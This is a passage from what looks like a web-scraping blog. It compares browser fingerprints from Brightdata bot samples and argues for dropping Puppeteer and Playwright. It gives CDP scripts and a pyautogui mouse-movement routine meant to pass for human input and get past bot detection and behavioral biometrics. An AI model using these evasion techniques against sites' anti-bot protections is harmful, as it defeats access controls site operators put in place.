<span class="nx">wait</span><span class="p">(</span><span class="s1">'#collapse-buttons > button.btn.btn-outline.btn-primary.expand-all'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">60000</span><span class="p">})</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#collapse-buttons > button.btn.btn-outline.btn-primary.expand-all'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<h4>Result 1: Fake Canvas detected in Data Collector bot</h4>
<p><a href="http://f.vision">f.vision</a> detection site claims to have detected fake canvas in <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a></p>
<figure>
<img src="https://incolumitas.com/images/fakeCanvas.png" alt="Detected fake canvas" />
<figcaption>Detected fake canvas</figcaption>
</figure>
<p>When expanding the information for <em>fake canvas</em>, <a href="http://f.vision">f.vision</a> tells me:</p>
<figure>
<img src="https://incolumitas.com/images/fakeCanvasInfo.png" alt="Detected fake canvas" />
<figcaption>More Information on fake canvas</figcaption>
</figure>
<p>It seems that those fake canvas detection tests originate from <a href="https://github.com/kkapsner/CanvasBlocker/issues/287">here</a>. The original test site is named <a href="https://canvasblocker.kkapsner.de/test/webGL-Test.html">webGL-Test</a>.</p>
<p>The author states in this GitHub issue:</p>
<blockquote>
<p>As you already found out the "fake input" mode prevents the detection of normal canvas. For WebGL I'm not aware of any (reasonable) way to prevent the detection there (actually I also have a detection page for webGL: https://canvasblocker.kkapsner.de/test/webGL-Test.html)</p>
</blockquote>
<p>I won't reproduce the test here, but I am quite confident that this finding is correct and that the bot spoofs different values for WebGL functionality.</p>
<h4>Result 2: Various Browser Fingerprints are Static across Bot Samples</h4>
<p>The bot detection site <a href="http://f.vision/">f.vision</a> has quite nice fingerprinting techniques. For that reason I will test if it is possible to detect
<a href="https://brightdata.com/products/data-collector">Brightdata's bot</a> with those fingerprints. Detection is possible if the following two properties hold:</p>
<ol>
<li>The fingerprints stay the same among many independent bot samples</li>
<li>Those fingerprints together have enough entropy so you can uniquely identify the bot among thousands of normal visitors</li>
</ol>
<table>
<thead>
<tr>
<th>#</th>
<th>HSTS</th>
<th>WEBGL</th>
<th>CANVAS</th>
<th>PLUGINS</th>
<th>AUDIO</th>
<th>CLIENT RECTS</th>
<th>FONTS</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>N/A</td>
<td>d0ae1aeb6476af3f</td>
<td>2140246792</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>8dc9258100071ba8</td>
</tr>
<tr>
<td>2</td>
<td>cc832e</td>
<td>d0ae1aeb6476af3f</td>
<td>1470235470</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>3</td>
<td>cc832e</td>
<td>d0ae1aeb6476af3f</td>
<td>1470235470</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>4</td>
<td>b8c752</td>
<td>d0ae1aeb6476af3f</td>
<td>-2125110224</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>023e4ca61828dfc7</td>
</tr>
<tr>
<td>5</td>
<td>94832d</td>
<td>d0ae1aeb6476af3f</td>
<td>-198118648</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>064d6b2722232577</td>
</tr>
<tr>
<td>6</td>
<td>1c7937</td>
<td>d0ae1aeb6476af3f</td>
<td>1426403692</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>7</td>
<td>dca0b6</td>
<td>d0ae1aeb6476af3f</td>
<td>-579119140</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>8</td>
<td>fd36e9</td>
<td>d0ae1aeb6476af3f</td>
<td>271321058</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>2aaf3ba9b5696cec</td>
</tr>
<tr>
<td>9</td>
<td>69116b</td>
<td>d0ae1aeb6476af3f</td>
<td>-2097547378</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
</tbody>
</table>
<p>As you can see from the nine <a href="https://brightdata.com/products/data-collector">Brightdata bot</a> samples collected, the fingerprints for WEBGL, PLUGINS, AUDIO and CLIENT RECTS stays consistent for each bot visit. The big question: How much entropy do those fingerprints have? Is it possible to uniquely identify a <a href="https://brightdata.com/products/data-collector">Brightdata data collector bot</a> with those fingerprints?</p>
<p>We can quickly test the entropy of the fingerprint data above by collecting samples with real devices.</p>
<p>The fingerprints below are taken with four different real devices when visiting <a href="http://f.vision/">f.vision</a>:</p>
<ol>
<li>With my laptop, Linux with Chrome</li>
<li>With my Android mobile phone with Firefox</li>
<li>With <a href="https://www.browserstack.com/">browserstack.com real device</a> OSX Big Sur with Chrome 91</li>
<li>With <a href="https://www.browserstack.com/">browserstack.com real device</a> Win10 with Chrome 91</li>
</ol>
<table>
<thead>
<tr>
<th>#</th>
<th>HSTS</th>
<th>WEBGL</th>
<th>CANVAS</th>
<th>PLUGINS</th>
<th>AUDIO</th>
<th>CLIENT RECTS</th>
<th>FONTS</th>
</tr>
</thead>
<tbody>
<tr>
<td>Linux with Chrome</td>
<td>420525</td>
<td>ab4364d46077693b</td>
<td>-31304244</td>
<td>cb43bb325b87c16f</td>
<td>19f2ec826da99435</td>
<td>ee5b6ada17b403ef</td>
<td>af1e3afb793f6d87</td>
</tr>
<tr>
<td>Android with Firefox</td>
<td>40b4f1</td>
<td>19208ef875544de3</td>
<td>1250865652</td>
<td>N/A</td>
<td>41efd79c6069738c</td>
<td>4612193a6e9f936b</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>OSX Big Sur with Chrome 91</td>
<td>1d26d5</td>
<td>2def3b550c3e950d</td>
<td>-434613739</td>
<td>f98ba1457738b341</td>
<td>d263e57872d8cbf0</td>
<td>09b8cf131bb1dacc</td>
<td>a5103579b5284324</td>
</tr>
<tr>
<td>Win10 with Chrome 91</td>
<td>356893</td>
<td>d0ae1aeb6476af3f</td>
<td>-17f22f0632</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>09b8cf131bb1dacc</td>
<td>a267018f11767e47</td>
</tr>
</tbody>
</table>
<p>Now let's check if the fingerprints WEBGL, PLUGINS, AUDIO and CLIENT RECTS have enough entropy.</p>
<p>I can disregard the WEBGL fingerprint as low entropy, because Win10 with Chrome has the same value as the bot (<code>d0ae1aeb6476af3f</code>).</p>
<p>Same applies to the PLUGINS fingerprint, because <code>f98ba1457738b341</code> appears also in OSX Big Sur with Chrome 91 and Win10 with Chrome 91.</p>
<p>Same story with AUDIO fingerprint. <code>19f2ec826da99435</code> occurs in Linux with Chrome and in Win10 with Chrome 91.</p>
<p>And CLIENT RECTS has also low entropy, because both OSX Big Sur with Chrome 91 and Win10 with Chrome 91 have the value <code>09b8cf131bb1dacc</code>.</p>
<p><strong>Conclusion:</strong> Fingerprinting for <a href="https://brightdata.com/products/data-collector">Brightdata's bot</a> will not be straighforward with <a href="http://f.vision/">f.vision</a> fingerprints.</p>Avoid Puppeteer or Playwright for Web Scraping2021-05-20T22:26:00+02:002021-05-25T14:50:00+02:00Nikolai Tschachertag:incolumitas.com,2021-05-20:/2021/05/20/avoid-puppeteer-and-playwright-for-scraping/<p>In this blog post I explain why it is best to avoid puppeteer and playwright for web scraping.</p><p><a class="btn" href="https://github.com/NikolaiT/stealthy-scraping-tools" style="padding: 10px; font-weight: 600; font-size: 15px;">Stealthy-scraping-tools repo on GitHub</a></p>
<h2>Introduction</h2>
<p>I don't suggest to use Puppeteer and Playwright for web scraping.</p>
<p>The reasons are very simple: </p>
<ol>
<li>Both libraries use pre-shipped chromium binaries that are not used by the ordinary Internet users for normal web browsing. For example, the current <code>puppeteer@v9.0.0</code> release uses the chromium version <code>Chromium 91.0.4469.0 (r869685)</code>. I doubt that this exact subversion is used by a substantial part of Internet users for their everyday browsing. </li>
<li>It is possible to detect that a browser is automated by those libraries based on many different behaviors that are unique to puppeteer or playwright.</li>
<li>Puppeteer/Playwright use Chromium. Most people use Google Chrome though. There are some <a href="https://chromium.googlesource.com/chromium/src/+/refs/heads/main/docs/chromium_browser_vs_google_chrome.md">minor differences</a> between those two Chrome browsers. However, Chrome is used way more often than Chromium!!!</li>
</ol>
<p>For example, puppeteer uses a <a href="https://github.com/puppeteer/puppeteer/blob/d01aa6c84a1e41f15ffed3a8d36ad26a404a7187/src/node/Launcher.ts#L160">plethora of command line flags</a> that you normally would not use when you launch a browser:</p>
<div class="highlight"><pre><span></span><code><span class="nx">defaultArgs</span><span class="p">(</span><span class="nx">options</span><span class="o">:</span> <span class="nx">BrowserLaunchArgumentOptions</span> <span class="o">=</span> <span class="p">{})</span><span class="o">:</span> <span class="nx">string</span><span class="p">[]</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">chromeArguments</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--disable-background-networking'</span><span class="p">,</span>
<span class="s1">'--enable-features=NetworkService,NetworkServiceInProcess'</span><span class="p">,</span>
<span class="s1">'--disable-background-timer-throttling'</span><span class="p">,</span>
<span class="s1">'--disable-backgrounding-occluded-windows'</span><span class="p">,</span>
<span class="s1">'--disable-breakpad'</span><span class="p">,</span>
<span class="s1">'--disable-client-side-phishing-detection'</span><span class="p">,</span>
<span class="s1">'--disable-component-extensions-with-background-pages'</span><span class="p">,</span>
<span class="s1">'--disable-default-apps'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-extensions'</span><span class="p">,</span>
<span class="s1">'--disable-features=Translate'</span><span class="p">,</span>
<span class="s1">'--disable-hang-monitor'</span><span class="p">,</span>
<span class="s1">'--disable-ipc-flooding-protection'</span><span class="p">,</span>
<span class="s1">'--disable-popup-blocking'</span><span class="p">,</span>
<span class="s1">'--disable-prompt-on-repost'</span><span class="p">,</span>
<span class="s1">'--disable-renderer-backgrounding'</span><span class="p">,</span>
<span class="s1">'--disable-sync'</span><span class="p">,</span>
<span class="s1">'--force-color-profile=srgb'</span><span class="p">,</span>
<span class="s1">'--metrics-recording-only'</span><span class="p">,</span>
<span class="s1">'--no-first-run'</span><span class="p">,</span>
<span class="s1">'--enable-automation'</span><span class="p">,</span>
<span class="s1">'--password-store=basic'</span><span class="p">,</span>
<span class="s1">'--use-mock-keychain'</span><span class="p">,</span>
<span class="c1">// TODO(sadym): remove '--enable-blink-features=IdleDetection'</span>
<span class="c1">// once IdleDetection is turned on by default.</span>
<span class="s1">'--enable-blink-features=IdleDetection'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="p">{</span>
<span class="nx">devtools</span> <span class="o">=</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">headless</span> <span class="o">=</span> <span class="o">!</span><span class="nx">devtools</span><span class="p">,</span>
<span class="nx">args</span> <span class="o">=</span> <span class="p">[],</span>
<span class="nx">userDataDir</span> <span class="o">=</span> <span class="kc">null</span><span class="p">,</span>
<span class="p">}</span> <span class="o">=</span> <span class="nx">options</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">userDataDir</span><span class="p">)</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="sb">`--user-data-dir=</span><span class="si">${</span><span class="nx">path</span><span class="p">.</span><span class="nx">resolve</span><span class="p">(</span><span class="nx">userDataDir</span><span class="p">)</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">devtools</span><span class="p">)</span> <span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--auto-open-devtools-for-tabs'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">headless</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--headless'</span><span class="p">,</span> <span class="s1">'--hide-scrollbars'</span><span class="p">,</span> <span class="s1">'--mute-audio'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">args</span><span class="p">.</span><span class="nx">every</span><span class="p">((</span><span class="nx">arg</span><span class="p">)</span> <span class="p">=></span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="s1">'-'</span><span class="p">)))</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'about:blank'</span><span class="p">);</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(...</span><span class="nx">args</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">chromeArguments</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>But there is more. The DOM and the window object of each page that is created with each call to <code>await browser.newPage()</code> sets up some puppeteer/playwright specific properties that are easy to detect. The easiest to detect is probably <code>navigator.webdriver</code> (even though I am not sure if puppeteer still uses this).</p>
<p>But aren't there npm modules such as <a href="https://github.com/berstend/puppeteer-extra/tree/master/packages/puppeteer-extra-plugin-stealth">puppeteer-extra-plugin-stealth</a> that are specifically developed to hide the fact that puppeteer is used? </p>
<p>Yes they exist, but they are very limited in their efficacy. It's just very hard to make puppeteer/playwright unseen once you use it.</p>
<p>And there is another reason why I suggest to keep the usage of the <a href="https://developer.chrome.com/docs/devtools/">Chrome DevTools</a> protocol as low as possible if you want to scrape undetected: Each command is sent over a WebSocket channel to the browser and a response is sent back. There is some inherent latency involved! I am not sure about it, but I assume that it must be possible to detect the usgage of puppeteer functionality such as </p>
<ol>
<li><code>page.waitForSelector(selector[, options])</code> <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagewaitforselectorselector-options">Source</a></li>
<li><code>page.waitForNavigation([options])</code> <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagewaitfornavigationoptions">Source</a></li>
</ol>
<p>because Bots usually do <em>some action</em> right after a certain selector emerges. Humans don't really care about xpath or css selectors.</p>
<p>If you stroll through the <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md">puppeteer API page</a>, you also see <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagegotourl-options">stuff</a> such as:</p>
<blockquote>
<p>NOTE Headless mode doesn't support navigation to a PDF document. See the <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=761295">upstream issue</a>.</p>
</blockquote>
<p>Another idea: Create a detection page that redirects the browser to a site serving a PDF document. If it cannot be deliverered, it might have been headless Chrome. Using express, such a headless Chrome trap could look like this:</p>
<div class="highlight"><pre><span></span><code><span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/headlessTrap'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// sends http header: Location: /example.pdf</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">redirect</span><span class="p">(</span><span class="s1">'/example.pdf'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/example.pdf'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span><span class="nx">fs</span><span class="p">.</span><span class="nx">readFileSync</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="s1">'public/dummy.pdf'</span><span class="p">));</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">contentType</span><span class="p">(</span><span class="s2">"application/pdf"</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Refresh'</span><span class="p">,</span><span class="s1">'1; url=/goal'</span><span class="p">)</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">666</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// when reaching this, not a bot</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/goal'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'<html><body><h1>All GOOD</h1></body></html>'</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
<h2>So what is the solution?</h2>
<p>The problem is that every scraping developer is either using puppeteer or playwright to create their bots. Therefore, all that the detectors have to do is to detect puppeteer or playwright - they don't have to detect bot like behavior in general, it's enough to detect the standard browser automation framework.</p>
<p>My suggestion is: <strong>Ditch the browser automation frameworks altogether!</strong></p>
<p>Think about it: What do I really need for basic browser automation in order to scrape a website?</p>
<p>All that is required for robust browser automation is a straightforward way to find the coordinates for CSS selectors and a way to obtain the HTML code of the current website.</p>
<h3>Obtaining Coordinates for a CSS selector</h3>
<p>Put differently, we need a way to implement the following function:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="p">(</span><span class="nx">css_selector</span><span class="o">:</span> <span class="nx">string</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="nx">x</span><span class="o">:</span> <span class="nx">number</span><span class="p">,</span> <span class="nx">y</span><span class="o">:</span> <span class="nx">number</span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>All the clicks, filling out forms, scrolling and other browser automation is done with desktop level browser automation instead of puppeteer's <code>page.click()</code>, <code>page.type()</code> and so on.</p>
<p>We only require the <a href="https://chromedevtools.github.io/devtools-protocol/">CDP</a> to translate CSS selectors into coordinates. </p>
<p>That can be done with the help of the small CDP library <code>chrome-remote-interface</code>.</p>
<p>After saving the following script as <code>coords.js</code>, you may invoke it to obtain the absolute coordinates for any element by specifying a css selector.</p>
<p><code>node coords.js 'div'</code></p>
<div class="highlight"><pre><span></span><code><span class="c1">// coords.js</span>
<span class="kd">const</span> <span class="nx">CDP</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-remote-interface'</span><span class="p">);</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getCoords</span><span class="p">(</span><span class="nx">css_selector</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">client</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="c1">// connect to endpoint</span>
<span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">CDP</span><span class="p">();</span>
<span class="c1">// extract domains</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">Runtime</span><span class="p">}</span> <span class="o">=</span> <span class="nx">client</span><span class="p">;</span>
<span class="c1">// enable events then start!</span>
<span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">([</span><span class="nx">Runtime</span><span class="p">.</span><span class="nx">enable</span><span class="p">()]);</span>
<span class="c1">// get clientRect of links</span>
<span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">({</span>
<span class="nx">expression</span><span class="o">:</span> <span class="sb">`var targetCoordEl = document.querySelector('</span><span class="si">${</span><span class="nx">css_selector</span><span class="si">}</span><span class="sb">'); if (targetCoordEl) { JSON.stringify(targetCoordEl.getClientRects()); }`</span>
<span class="p">});</span>
<span class="c1">// get offset screen positioning</span>
<span class="kd">const</span> <span class="nx">screenPos</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">({</span>
<span class="nx">expression</span><span class="o">:</span> <span class="s2">"JSON.stringify({offsetY: window.screen.height - window.innerHeight, offsetX: window.screen.width - window.innerWidth})"</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">offset</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">screenPos</span><span class="p">.</span><span class="nx">result</span><span class="p">.</span><span class="nx">value</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">clientRect</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">clientRect</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nx">result</span><span class="p">.</span><span class="nx">value</span><span class="p">)[</span><span class="s2">"0"</span><span class="p">];</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">retVal</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">x</span><span class="o">:</span> <span class="nx">offset</span><span class="p">.</span><span class="nx">offsetX</span> <span class="o">+</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">x</span><span class="p">,</span>
<span class="nx">y</span><span class="o">:</span> <span class="nx">offset</span><span class="p">.</span><span class="nx">offsetY</span> <span class="o">+</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">y</span><span class="p">,</span>
<span class="nx">width</span><span class="o">:</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">width</span><span class="p">,</span>
<span class="nx">height</span><span class="o">:</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">height</span><span class="p">,</span>
<span class="p">};</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">css_selector</span><span class="p">,</span> <span class="nx">retVal</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">retVal</span><span class="p">;</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">client</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">getCoords</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">argv</span><span class="p">[</span><span class="mf">2</span><span class="p">]);</span>
</code></pre></div>
<h3>Obtaining the HTML of the current page</h3>
<p>Grabbing the HTML code of the current page can also be implemented in a straightforward fashion with the CDP. Save the following script as <code>page_source.js</code>.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// page_source.js</span>
<span class="kd">const</span> <span class="nx">CDP</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-remote-interface'</span><span class="p">);</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getPageSource</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">client</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="c1">// connect to endpoint</span>
<span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">CDP</span><span class="p">();</span>
<span class="c1">// extract domains</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">Page</span><span class="p">,</span> <span class="nx">Runtime</span><span class="p">,</span> <span class="nx">DOM</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">client</span><span class="p">;</span>
<span class="c1">// enable events then start!</span>
<span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">([</span><span class="nx">Page</span><span class="p">.</span><span class="nx">enable</span><span class="p">(),</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">enable</span><span class="p">(),</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">enable</span><span class="p">()]);</span>
<span class="c1">// get the page source</span>
<span class="kd">const</span> <span class="nx">rootNode</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">getDocument</span><span class="p">({</span> <span class="nx">depth</span><span class="o">:</span> <span class="o">-</span><span class="mf">1</span> <span class="p">});</span>
<span class="kd">const</span> <span class="nx">pageSource</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">DOM</span><span class="p">.</span><span class="nx">getOuterHTML</span><span class="p">({</span>
<span class="nx">nodeId</span><span class="o">:</span> <span class="nx">rootNode</span><span class="p">.</span><span class="nx">root</span><span class="p">.</span><span class="nx">nodeId</span>
<span class="p">});</span>
<span class="k">return</span> <span class="nx">pageSource</span><span class="p">.</span><span class="nx">outerHTML</span><span class="p">;</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">client</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">getPageSource</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">pageSource</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">pageSource</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<h3>Controlling the Mouse and Keyboard</h3>
<p>Of course it's also necessary to control the mouse and keyboard in order to navigate a website. The straightforward way would be to use puppeteer's keyboard and mouse interaction functionality such as <code>page.click()</code> or <code>page.type()</code>, however I strongly discourage to use them for reasons discussed above.</p>
<p>Instead, my suggestion is to use a proper desktop automation library such as <code>pyautogui</code> in case you want to use Python.</p>
<p>Hereby, it's mandatory to simulate human organic mouse (or touchscreen) and typing interactions as closely as possible. Put differently, we want to defend against the research that investigates the <em>suitability of behavioral biometrics to distinguish between computers and humans</em>.</p>
<p><a href="https://arxiv.org/abs/2005.00890">Recent research</a> suggests several ways how to mimic human mouse movement behavior as closely as possible.</p>
<p>There are two papers of considerable interest here:</p>
<ol>
<li>Paper 1) Analyzing key strokes: <strong>TypeNet: Deep Learning Keystroke Biometrics</strong> <a href="https://arxiv.org/abs/2101.05570">PDF</a></li>
<li>Paper 2) Research how to mimic human mouse movements: <strong>BeCAPTCHA-Mouse: Synthetic Mouse Trajectories and Improved Bot Detection</strong> <a href="https://arxiv.org/abs/2005.00890">PDF</a></li>
</ol>
<p>In this blog post, I don't have the means to dig deep into the listed papers. So I am going to present the two main findings of those papers and I will develop a simplified function that mimics human mouse/keyboard interaction. They of course are not perfect, but this is not the goal here.</p>
<p>In my opinion, the main statement of the BeCAPTCHA-Mouse paper is </p>
<blockquote>
<p>By looking at typical mouse movements, we can observe some
aspects typically performed by humans during mouse trajectories execution: an
initial acceleration and final deceleration performed by the antagonist (activate
the movement) and agonist muscles (opposing joint torque), and a fine-
correction in the direction at the end of the trajectory when the mouse cursor
gets close to the click button (characterized by a low velocity that serves to
improve the precision of the movement). These aspects motivated us to use
neuromotor analysis to find distinctive features in human mouse movements.
Neuromotor-fine skills, that are unique of human beings are difficult to emulate
for bots and could provide distinctive features in order to tell humans and bots
apart.</p>
</blockquote>
<p>And because images speak more than a thousands words:</p>
<figure>
<img src="https://incolumitas.com/images/becaptcha.png" alt="Mouse Movement Speed Profile" />
<figcaption>Image taken from the BeCAPTCHA paper: Example of the mouse task determined by 8 keypoints: the crosses represent the keypoint where the user must click, red circles are the (x,y) coordinates obtained from the mouse device, and the black line is the mouse trajectory.<span style="font-size: 60%"></span></figcaption>
</figure>
<p>This is my very amateurish way to implement the lesson taken from the BeCAPTCHA paper by using <code>pyautogui</code> for mouse movements. Store the following Python script as <code>mouse.py</code>.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pyautogui</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="k">def</span> <span class="nf">someWhereRandomClose</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">max_dist</span><span class="o">=</span><span class="mi">120</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Find a random position close to (x, y)</span>
<span class="sd"> with maximal dist @max_dist</span>
<span class="sd"> """</span>
